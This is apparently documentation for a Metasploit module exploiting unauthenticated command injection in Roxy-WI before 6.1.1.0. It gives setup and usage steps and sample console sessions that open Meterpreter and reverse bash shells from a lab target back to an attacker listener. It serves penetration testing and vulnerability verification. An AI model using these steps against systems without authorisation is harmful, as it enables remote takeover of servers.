## Vulnerable Application

### Description

This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0.
Successful exploitation results in remote code execution under the context of the web server user.


### Setup

Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.

https://roxy-wi.org/installation.py#manual

```
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py 
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi
```

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/roxy_wi_exec`
4. Set `RHOST` to the address of the target Roxy-WI machine.
5. Set `LHOST` to the address of your attacking machine.
8. Run `exploit`
9. Do: `run`
10. You should get a shell as the user running the Roxy-WI server.

## Options
Set `TAGETURI` if the Roxy-WI is installed at a custom path.

### TARGETURI
The base path to Roxy-WI. The default value is `/`

## Scenarios

```
msf6 > use exploit/linux/http/roxy_wi_exec 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Sending stage (40164 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:37394) at 2022-07-21 13:49:23 +0300
[+] Exploit successfully executed.

meterpreter > pwd
/var/www/haproxy-wi/app
```

You can also use cmd payloads.

```
msf6 > use exploit/linux/http/roxy_wi_exec 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
[+] Exploit successfully executed.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)```
```